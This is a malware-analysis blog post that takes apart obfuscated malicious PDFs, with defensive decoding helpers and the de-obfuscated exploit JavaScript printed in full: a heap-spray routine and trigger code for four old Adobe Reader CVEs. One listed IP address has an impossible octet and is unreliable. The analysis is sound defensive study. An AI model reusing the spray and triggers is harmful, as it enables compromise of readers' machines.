Exploring recent PDF exploits: A Time Killer

Over the past few months I've seen numerous articles and CVEs on Adobe Reader and its vulnerabilities. It seems like every day I wake up to a new discussion on how to launch some bit of JavaScript or run application xyz. I've also been seeing many attempts to exploit old vulnerabilities (usually found by correlating suspicious domains to sets of drive-by-download PDF files, thanks to a short script by my friend Dave). Either way, this last week the number of malicious PDFs increased, so I decided to take some apart and familiarize myself with the different vulnerabilities and the role JavaScript plays in them. All the information I found had already been documented (and I'll try my best to link to those discoveries), but I want to walk through my investigation and maybe turn over a few overlooked rocks.

First let me talk a bit about Didier Stevens. I found his blog shortly after I started deciphering the weird syntax that makes up a PDF file. He has a few tools which analyze and generate PDF files; take a look. I used his 'Make PDF' tool to familiarize myself with how PDFs and JavaScript communicate. There's also a short and neat article here which outlines 4 ways to execute JavaScript embedded in a PDF. Didier's page on PDF tools describes the output of pdfid, but here is what you want to look for:

  • How JavaScript is launched (/Names, /OpenAction, /AA, /Annots)
  • Whether the document contains JavaScript (/JS, /JavaScript)
  • Whether the document hides code behind some type of stream compression or encoding (/Filter)
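
As a rough illustration of that checklist, here is a minimal sketch that counts the names in the raw text of a PDF. It is not pdfid and doesn't try to match its output; the function name countKeywords and the sample string are my own, and it ignores names disguised with #xx hex escapes, which a real scanner has to handle.

```javascript
// Names worth counting, taken from the checklist above.
const KEYWORDS = ["/JS", "/JavaScript", "/OpenAction", "/AA", "/Names", "/Annots", "/Filter"];

// Count each name, requiring that it is not followed by another letter or
// digit, so "/AA" does not match inside a longer name such as "/AAPL".
function countKeywords(pdfText) {
  const counts = {};
  for (const keyword of KEYWORDS) {
    const pattern = new RegExp(keyword + "(?![A-Za-z0-9])", "g");
    const matches = pdfText.match(pattern);
    counts[keyword] = matches ? matches.length : 0;
  }
  return counts;
}

// Hypothetical sample: two dictionaries in the style of the objects shown later.
const keywordSample = "<</S /JavaScript /JS 15 0 R>> <</Filter [ /FlateDecode ] /Length 2375>>";
console.log(countKeywords(keywordSample));
```

For a real file, the text could be loaded with fs.readFileSync(path, "latin1") so that binary stream bytes survive as single characters.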

There's also a nice article about writing loaders for IDA which extract shellcode from the PDFs. In the next part I'll explain a bit of trivial sneakiness which makes writing a loader more complicated, as you'll need a new one for each flavor of 'sneaky'.

Sneakiness

Ok, the first flavor of documents I analyzed used /Names to run a section of /JavaScript (not an exploit yet):

13 0 obj
<</Names [(fea9fc5) 14 0 R ]>>
endobj
14 0 obj
<</S /JavaScript /JS 15 0 R>>
endobj
[...]
17 0 obj
<</Type /Catalog /Pages 1 0 R /PageLayout /OneColumn
/Names <</JavaScript 13 0 R>>
>>
endobj
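
The chain of references in this excerpt (catalog, name tree, action, script stream) can also be traced mechanically. The following is only a sketch built around this exact layout: the helper names are mine, it uses regular expressions instead of a real PDF parser, and it assumes a single catalog with a one-entry name tree.

```javascript
// Index every "N G obj ... endobj" body by its object number.
function indexObjects(pdfText) {
  const objects = new Map();
  const objectPattern = /(\d+)\s+\d+\s+obj\b([\s\S]*?)endobj/g;
  let match;
  while ((match = objectPattern.exec(pdfText)) !== null) {
    objects.set(Number(match[1]), match[2].trim());
  }
  return objects;
}

// Return the object number of the first "<prefix> N G R" reference, or null.
function firstRef(body, prefix) {
  const match = new RegExp(prefix + "\\s*(\\d+)\\s+\\d+\\s+R").exec(body || "");
  return match ? Number(match[1]) : null;
}

// Follow catalog -> /Names /JavaScript -> name tree entry -> /JS.
function traceJavaScriptChain(pdfText) {
  const objects = indexObjects(pdfText);
  let catalog = null;
  for (const [number, body] of objects) {
    if (/\/Type\s*\/Catalog/.test(body)) catalog = number;
  }
  if (catalog === null) return [];
  const nameTree = firstRef(objects.get(catalog), "/JavaScript");
  const action = firstRef(objects.get(nameTree), "\\)"); // "(name) 14 0 R"
  const script = firstRef(objects.get(action), "/JS");
  return [catalog, nameTree, action, script];
}

// The excerpt from this article, joined into one string.
const chainSample = [
  "13 0 obj", "<</Names [(fea9fc5) 14 0 R ]>>", "endobj",
  "14 0 obj", "<</S /JavaScript /JS 15 0 R>>", "endobj",
  "17 0 obj", "<</Type /Catalog /Pages 1 0 R /PageLayout /OneColumn",
  "/Names <</JavaScript 13 0 R>>", ">>", "endobj",
].join("\n");
console.log(traceJavaScriptChain(chainSample));
```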

Not difficult to follow, seems like whatever lies in object 15 will be JavaScript. The next trick: hiding the JavaScript using compression.

15 0 obj
<</Filter [ /FlateDecode ] /Length 2375>>
stream
[...unreadable...]
endstream
endobj

The '/FlateDecode' filter tells the reader to decode a stream compressed with the flate (zlib/deflate, the same method used in ZIP) algorithm. The malware authors are not married to FlateDecode either: take your pick of /ASCIIHexDecode, /ASCII85Decode, /RunLengthDecode, or any combination/permutation of filters. However the author compresses or encodes the JavaScript, a simple run of pdftk with the uncompress operation will expose the hidden script. Let's call this layer 1 obfuscation, the compression layer; it can be algorithmically decoded and shouldn't be enough to fool a PDF analyzer with even minor intelligence. (Although the presence of /OpenAction, /AA or even /JavaScript should be cause enough for investigation.)
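
To show why this layer is purely mechanical, here is a small sketch that undoes a chain of filters in the order they are listed in /Filter. It runs under Node.js and uses its zlib module; decodeStream and asciiHexDecode are names I made up, only two of the filters are covered, and the test data is a round trip I generate myself rather than a real sample.

```javascript
const zlib = require("zlib");

// Undo /ASCIIHexDecode: drop whitespace, stop at the ">" end marker,
// and pad a trailing odd digit with 0.
function asciiHexDecode(buffer) {
  let hex = buffer.toString("latin1").replace(/\s+/g, "");
  const end = hex.indexOf(">");
  if (end !== -1) hex = hex.slice(0, end);
  if (hex.length % 2 === 1) hex += "0";
  return Buffer.from(hex, "hex");
}

// Only the two filters handled by this sketch.
const DECODERS = {
  FlateDecode: (buffer) => zlib.inflateSync(buffer),
  ASCIIHexDecode: asciiHexDecode,
};

// Apply the decoders in the order the names appear in the /Filter array.
function decodeStream(buffer, filters) {
  return filters.reduce((data, name) => {
    const decoder = DECODERS[name];
    if (!decoder) throw new Error("unsupported filter: " + name);
    return decoder(data);
  }, buffer);
}

// Round trip on made-up data: deflate, then hex-encode, then decode both.
const plainScript = Buffer.from('var theMessage = "";', "latin1");
const encodedScript = Buffer.from(zlib.deflateSync(plainScript).toString("hex") + ">", "latin1");
const decodedScript = decodeStream(encodedScript, ["ASCIIHexDecode", "FlateDecode"]);
console.log(decodedScript.toString("latin1"));
```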

The unreadable stream, when uncompressed, is an anonymous JavaScript function called from object 14. It's still hard to read, most likely because it was sent through an obfuscator to defeat scans for words like "eval", "parseInt", "getPage", etc. After a few minutes of de-obfuscating the code, we get the following (again, you can run this through a JavaScript evaluator):

var theMessage = "";
var numWords = this.getPageNumWords(2);
var word;
for (var count = 0; count < numWords; count++) {
  word = this.parseInt(this.getPageNthWord(2, count), 16);
  word = String.fromCharCode(word ^ 28);
  theMessage += word;
}
this.eval(theMessage);

This short bit of JavaScript decodes the second layer of obfuscation, the embedded layer (it reveals a second chunk of JavaScript code embedded as page contents). Walking through this: "getPageNumWords(2)" returns the number of whitespace-separated words on page index 2, which is the third page of the PDF because page numbering starts at 0. Under the catalog object, look for the 'pages' object, whose /Kids entry defines the order of the pages. This shows me that object 7 is the 3rd page and that its contents are stored in object 8 (also a jumbly mess encoded with /FlateDecode). Decoding it yields a list of hex values; the JavaScript XORs each value with 28, converts it to a character, appends it to a message, and finally evaluates that message. More JavaScript. This method is also explained here; there are a few differences, but the general process seems copied.
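
The same decoding can be done outside of Reader, without evaluating anything, once the page words have been pulled out of the decompressed stream. This is a minimal sketch: decodePageWords mirrors the loop above, while encodeAsPageWords is a hypothetical helper I added only to produce test input.

```javascript
// XOR every hex word with the key and rebuild the hidden script as text.
// Unlike the original, the result is returned instead of being passed to eval.
function decodePageWords(words, key) {
  let message = "";
  for (const word of words) {
    message += String.fromCharCode(parseInt(word, 16) ^ key);
  }
  return message;
}

// Hypothetical inverse, used here only to build demonstration input.
function encodeAsPageWords(text, key) {
  return Array.from(text, (ch) => (ch.charCodeAt(0) ^ key).toString(16));
}

const demoWords = encodeAsPageWords("app.alert(1);", 28);
console.log(demoWords.join(" "));
console.log(decodePageWords(demoWords, 28));
```

With a real sample, the words would come from splitting the decoded page text on whitespace, for example pageText.trim().split(/\s+/).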

The exploit

This is where things get interesting, and bear with me as this is my first time reversing malware. I'll start with my favorite part, the portability of the malicious PDF. Up until now I've explained how the exploit (consisting of a bit of JavaScript, bug triggering, and shellcode) is obfuscated. This flavor of malicious PDF uses the same bit of obfuscation throughout, and it continues into the exploit code. The first part decrypts a polyalphabetic substitution cipher embedded in the PDF metadata, specifically the /Author and /Keywords fields. The decrypted text is a URI, which the exploit (layer 3, the shellcode) uses to phone home with the running version of Adobe Reader and to pull down more malware.

Interestingly, the code limits the URI to 32 characters and the version variable to 24 characters, 56 in total. The samples we found used 5 and 6 letter domain names, all under the 'com' TLD, with a path of 8 or 9 random characters (subdirectories included) ending in ".php?&". The shellcode is stored as Unicode characters (which is typical for Adobe exploits utilizing JavaScript) and is concatenated with the 56 byte URI.

After the URI is decrypted, the exploit performs a series of heap sprays and tries a series of old bugs in Adobe Reader. Take a look at wishi's article about how to heap spray using JavaScript in Adobe PDFs. It is essentially repeated in the exploit, which allocates approximately 96MB worth of NOPs followed by shellcode before each bug triggering attempt. The PDF tries the following bugs: util.printf (CVE-2008-2992), Collab.collectEmailInfo (CVE-2007-5659), Collab.getIcon (CVE-2009-0927), and media.newPlayer (CVE-2009-4324). The best part about this process is a left-over debug feature. Apparently if you change a field in the PDF metadata to "debug", the script will alert before it runs each exploit. (You know, so you can keep track of how you're getting owned.)

How it heap sprays:

var qV = 4194304; /*4megs*/
var ts = unicode.length * 2; /*808*/
var ez = qV - (ts + 56); /*4193440*/
var qL = unescape("%u9090%u9090"); /*nopnopnopnop*/
while (qL.length * 2 /*4*/ < ez /*4193440*/) {
  qL += qL; /*create slide*/
}
qL = qL.substring(0, ez / 2);
var x6 = (qP - 4194304) / qV; /*approx 48*/
for (var jK = 0; jK < x6; jK++) { /*approx 96MB*/
  qN[jK] = qL + unicode; /*allocate memory please*/
}
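
The numbers in those comments can be checked with a bit of arithmetic. This sketch only computes sizes and allocates nothing; sprayChunkLayout and sprayTotalMiB are my own names, the payload length of 404 characters is derived from the /*808*/ comment, and it assumes every JavaScript string character takes two bytes, which is what the "* 2" in the script implies.

```javascript
// Sizes for one sprayed string: NOP slide plus payload, with some bytes
// held back (the script reserves 56).
function sprayChunkLayout(chunkBytes, payloadChars, reservedBytes) {
  const payloadBytes = payloadChars * 2; // two bytes per character (assumed)
  const slideBytes = chunkBytes - (payloadBytes + reservedBytes);
  return {
    payloadBytes,
    slideBytes,
    slideChars: slideBytes / 2,
    stringBytes: slideBytes + payloadBytes,
  };
}

// Total size of the spray in MiB for a given number of chunks.
function sprayTotalMiB(chunks, chunkBytes) {
  return (chunks * chunkBytes) / (1024 * 1024);
}

const sprayLayout = sprayChunkLayout(4194304, 404, 56);
console.log(sprayLayout);
console.log(sprayTotalMiB(24, 4194304), sprayTotalMiB(48, 4194304));
```

This reproduces the 808 and 4193440 values from the comments. Under the two-byte assumption, 24 chunks come to 96 MiB and 48 chunks to 192 MiB; the value of qP isn't shown in the listing, so I can't say which of the two "approx" comments is the accurate one.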

And the bugs included in the exploit are as follows:

/*spray heap*/
var aV = "12999999999999999999";
for (dK = 0; dK < 276; dK++) {
  aV += "8";
}
util.printf("%45000f", aV);
/*spray heap*/
var wV = unescape("%u0c0c%u0c0c");
while (wV.length < 44952) {
  wV += wV;
}
this.collabStore = Collab.collectEmailInfo({subj: "", msg: wV});
/*spray heap*/
var jIP = unescape("%09");
while (jIP.length < 16384) {
  jIP += jIP;
}
jIP = "N." + jIP;
app.doc.Collab.getIcon(jIP);
/*spray heap*/
var sf = "1.000000000.000000000.1337 : 3.13.37";
util.printd(sf, new Date);
try {
  media.newPlayer(null);
} catch (e) {}
util.printd(sf, new Date);

Summary

Figure A: Wepawet analysis of feature detection

Over the last few days I've been seeing a few flavors of malicious PDF files. This one contains a similar URI structure, limited to 56 characters by the logic embedded in the exploiting JavaScript code. All of the sampled domain names resolve to 194.8.250.62, 194.8.260.61, or 194.8.250.15, all belonging to a dedicated hosting company in Paraguay. This is most likely a double fast-flux network which is currently using the servers in Paraguay as proxies.

This is another article explaining a bit about the attack. It has very few details, and don't be fooled by the URI it provides: each sample PDF uses a different URI (there is no catch-all, just the logic I've noticed and tried to explain above). They do mention something worth noting: the attack begins by detecting PDF/Java capabilities, as shown in the logic from the Wepawet screen capture included as Figure A.

Dave and I are still working on reversing the shellcode (we're not technically savvy enough at this point, but it's a good time to learn!). In this particular flavor of malicious PDF the shellcode is as follows.

Shellcode:

The shellcode extracted from JavaScript in a PDF

It's nothing new; a few other sites list it, including some Wepawet analysis summaries. In the coming weeks I'll expand a bit more on the analysis of a few other flavors, and on some threat analysis tricks I've been scheming (related to malicious PDFs).